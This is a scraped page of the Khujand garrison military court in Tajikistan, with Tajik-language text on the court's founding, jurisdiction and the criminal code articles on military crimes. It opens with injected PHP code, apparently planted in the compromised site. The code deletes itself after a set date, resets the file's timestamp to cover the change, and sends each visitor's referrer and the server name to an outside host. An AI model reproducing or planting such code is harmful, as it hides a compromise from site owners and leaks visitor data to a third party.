check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456756289){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); }

Joom!Fish config error: Default language is inactive!
 
Please check configuration, try to use first active language

Суди ҳарбии гарнизони Хуҷанд
  1. Skip to Menu
  2. Skip to Content
  3. Skip to Footer>

Суди ҳарбии гарнизони Хуҷанд

09 Августа 2013

Бо Қарори Президуми Шӯрои Олии Ҷумҳурии Тоҷикистон 18 июни соли 1994 судҳои ҳарбии гарнизонҳои ҷумҳурӣ – Душанбе, Хуҷанд, Хатлон ва пас аз он Хоруғ таъсис ёфтаанд.

Судҳои ҳарбӣ дар асоси Конститутсияи (Сарқонуни) Ҷумҳурии Тоҷикистон, меъёрҳои байналхалқӣ ва дигар қонунҳо, амал мекунанд, аз болои онҳо мақомоти Олии судӣ- Суди Олии Ҷумҳурии Тоҷикистон назорат мебарад. Ҳар як парвандае, ки аз тарафи судҳои ҳарбӣ баррасӣ гаштааст, метавонад ба тариқи кассатсионӣ, назоратӣ ва дар Раёсати Суди Олии Ҷумҳурии Тоҷикистон баррасӣ гардад, ки ин яке аз кафолатҳои асосии қонуният дар фаъолияти судҳои ҳарбӣ мебошад.

Мувофиқи моддаи 61 Қонуни Ҷумҳурии Тоҷикистон «Дар бораи судхои Чумхурии Точикистон» судхои харбии Чумхурии Точикистон ба системаи судии Ҷумҳурии Тоҷикистон дохил буда, дар тамоми қисмҳои ҳарбӣ, муассисаю корхона ва ташкилотҳои Қувваҳои Мусаллаҳи Ҷумҳурии Тоҷикистон, қушунҳои дохилии Вазорати корҳои дохилии Ҷумҳурии Тоҷикистон, кқшунҳои сарҳадии Кумитаи ҳифзи сарҳди давлатии назди Ҳукумати Ҷумҳурии Тоҷикистон, КДАМ Ҷумҳурии Тоҷикистон, Кумитаи ҳолатҳои фавқуллода ва мудофиаи граждании Ҷумҳурии Тоҷикистон, мақомоти идораи ҳарбӣ ва дигар қисмҳои алоҳидаи ҳарбӣ адолати судиро ба амал мебароранд.

Дар қисмҳои ҳарбии дигар давлатҳо, ки дар қаламрави Ҷумҳурии Тоҷикистон воқеъ гардидаанд, адолати судӣ аз номи Ҷумҳурии Тоҷикистон мувофики созишномаҳои ба имзорасидаи байнидавлатӣ ба амал бароварда мешавад.

Судҳои харби дар хайати Куввахои Мусаллахи Чумхурии Точикистон аз руи Принсипи худуди дар махалли вокеъшавии гарнизонхо таъсис дода шуда, аз судхои харбии гарнизонхо ва Коллегияи харбии Суди Олии Чумхурии Точикистон иборат мебошанд.

Фаъолияти судхои харби ба хифзи хукуку озодихои хизматчиёни харби, шахрвандоне, ки аз чамъомади харби мегузаранд ва дигар шахрвандон, хукук ва манфиатхои конунии кисмхо, корхонаю муассиса ва ташкилотхои харби, мустахкам кардани конуният ва тартиботи хукуки, ба таҳкими лаёқат ва омодагии ҷангӣ дар Қувваҳои мусаллаҳ, интизоми ҳарбӣ ва тартиби муайянкардаи гузаштани хизмати ҳарбӣ, равон карда шудааст.

Ба судҳои ҳарбӣ парвандаҳо оиди ҷиноятҳои аз тарафи хизматчиёни ҳарбӣ, инчунин шахсони ӯҳдадори ҳарбии дар вақти аз тарафи онҳо гузаштани ҷамъомадҳои ҳарбӣ содиршуда, тобеъияти судӣ доранд. Парвандаҳо оиди ҷиноятҳои аз тарафи ашхоси ҳайати афсарон, прапоршикҳо, старшинаҳо, сержантҳо ва аскарҳои Вазорати амният, хизматчиёни ҳарбии қувваҳои сарҳадӣ, Гвардияи миллӣ ва Вазорати ҳолатҳои фавқуллода ва мудофиаи шаҳрвандӣ содиршуда, парвандаҳо оиди ҷиноятҳои аз тарафи хизматчиёни ҳарбии қӯшунҳои дохилӣ, қисмҳои милиса ва ҷузъу томҳои Вазорати корҳои дохилӣ, ки бо даъват созмон дода шудаанд содиршуда, парвандаҳо оиди ҷиноятҳои муқобили тартиби муайянкардаи қонун, ҷиноятҳои аз ҷониби ҳайати ашхоси роҳбарикунандаи муассисаҳои ислоҳӣ, ҳамаи парвандаҳо дар бораи ҷосусӣ, баррасӣ мегарданд.

Судҳои ҳарбӣ инчунин парвандаҳоро аз рӯи шикоятҳои хизматчиёни ҳарбӣ, шаҳрвандон, ки ҷамъомадҳои ҳарбиро мегузаранд, ба ҳаракатҳо ва қарорҳои мақомоти роҳбарии ҳарбӣ ва ашхоси мансабдори ҳарбӣ, ки ҳуқуқ ва озодиҳои онҳоро поймол кардаанд, баррасӣ менамоянд.

Фасли 14, боби 33-и Кодекси ҷиноятии Ҷумҳурии Тоҷикистон ба ҷиноятҳо ба муқобили хизмати ҳарбӣ бахшида шуда, моддаҳои 366 то 394-ро дар бар мегирад, ки аз онҳо моддаи 367 ва 394 хориҷ карда шудаанд.

Моддаи 366 ҳамин Кодекс мафҳуми ҷиноятҳо ба муқобили хизмати ҳарбиро чунин таъриф додааст, ҷиноятҳои муқобили хизмати ҳарбӣ - он ҷиноятҳои пешбининамудаи ҳамин боб эътироф карда мешаванд, ки ба муқобили тартиботи муқарраргардидаи адои хизмати ҳарбӣ аз ҷониби хизматчиёни ҳарбӣ, ки дар асоси даъват ё ба тартиби ихтиёрӣ дар Кувваҳои мусаллаҳи Ҷумҳурии Тоҷикистон ва дигар сохторҳои ҳарбии Ҷумҳурии Тоҷикистон адои хизмат мекунанд, содир шудаанд, ҳамчунин аз ҷониби шаҳрвандони дар эҳтиётбуда, ҳангоми гузаштани ҷамъомадҳои ҳарбӣ ё шахсоне, ки мутобиқи қонунҳои ҷорӣ мақоми хизматии ҳарбӣ доранд, содир шудаанд.

Мувофиқи моддаи 1 Қонуни Ҷумҳурии Тоҷикистон «Дар бораи ӯҳдадории умумии ҳарбӣ ва хизмати ҳарбӣ» шахсе хизматчии ҳарбӣ ба ҳисоб меравад, ки агар ӯ хизмати ҳарбиро дар сафи Қӯшунҳои Мусаллаҳи Ҷумҳурии Тоҷикистон, дигар қӯшунҳо ва ҷузъу томҳои ҳарбии Ҷумҳурии Тоҷикистон адо мекарда бошад.

Ҷиноятҳое, ки дар моддаҳои 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393 Кодекси ҷиноятии Ҷумҳурии Тоҷикистон пешбинӣ шудаанд, ҷиноятҳои ҳарбӣ ба шумор рафта, ин ҷиноятҳо тартиби адои хизмати ҳарбиро халалдор намуда, бевосита омодагии ҷангии қӯшунҳоро вайрон мекунанд, аз лиҳоз характери хос ва хавфи истисноӣ доранд. Онҳо ё характери истисноии ҳарбӣ доранд, ки бо дигар таркибҳои умумиҷиноятӣ мувофиқат намекунанд (мисол: фирор моддаи 375 КҶ ҶТ) ё нисбатан ҳарбӣ буда, бо баъзе ҷиноятҳои умумӣ монандӣ доранд, аммо дар шароити хизмати ҳарбӣ хавфи баланд доранд (мисол: истифодаи зӯроварӣ дар ҳаққи сардор моддаи 370 КҶ ҶТ)

Ба тартиби адои хизмати ҳарбӣ инчунин дигар ҷиноятҳое шуда метавонанд, ки боби 33 Кодекси ҷиноятии Ҷумҳурии Тоҷикистон фаро нагирифтааст. Масалан: аз ҷониби хизматчии ҳарбӣ дуздидани амволи ҳарбӣ моддаи 244 КҶ (ба истисноӣ яроқи оташфтшон, лавозимоти ҷангӣ ва техникаи ҷангӣ), куштори сардор вобаста ба иҷрои хизмати ҳарбӣ аз ҷониби хизматчии ҳарбӣ моддаи 104 КҶ.

Суди харбии гарнизони Хучанд – Конститутсияи Ҷумҳурии Тоҷикистон, Қонуни Конститутсионии Ҷумҳурии Тоҷикистон «Дар бораи судҳои Ҷумҳурии Тоҷикистон», Фармонҳои Президенти Ҷумҳурии Тоҷикистон - мӯҳтарам Э.Ш.Раҳмонов «Оиди пурзӯр намудани мубориза бар зидди ҷинояткории муташаккилона, корупсия, терроризм», «Муомилоти ғайриқонунии маводи нашъадор» ва Паёмҳои ҳарсолаи Президенти кишварамон ба Маҷлиси Олии Ҷумҳурии Тоҷикистон, суханронии он кас дар машварати кормандони мақомоти ҳифзи ҳуқуқ ва сохторҳои низомӣ, Қарорҳои Пленуми Судӣ Олии Ҷумҳурии Тоҷикистон, Фармонҳои Роҳбарияти Суди Олии Ҷумҳурии Тоҷикистон, Шурои адлияи Чумхуриии Точикистонро таҳти роҳбарӣ ва иҷроиши доимии худ қарор дода, адолати судиро дар Қувваҳои мусаллаҳ ва дигар сохторҳои низомии ҷумҳурӣ амалӣ сохта истода, ҳамаи чораҳоро баҳри он меандешад, ки касе беасос маҳкум нашавад ва шахсони ҷиноят содир карда бе ҷазо намонанд.

Суроға: Вилояти Суғд, шаҳри Хуҷанд кӯчаи Дилбар Раҳимова 2 «а». 
Телефон барои тамос: (83422) 5-2011; 5-5917. 
Индекси почта: 735700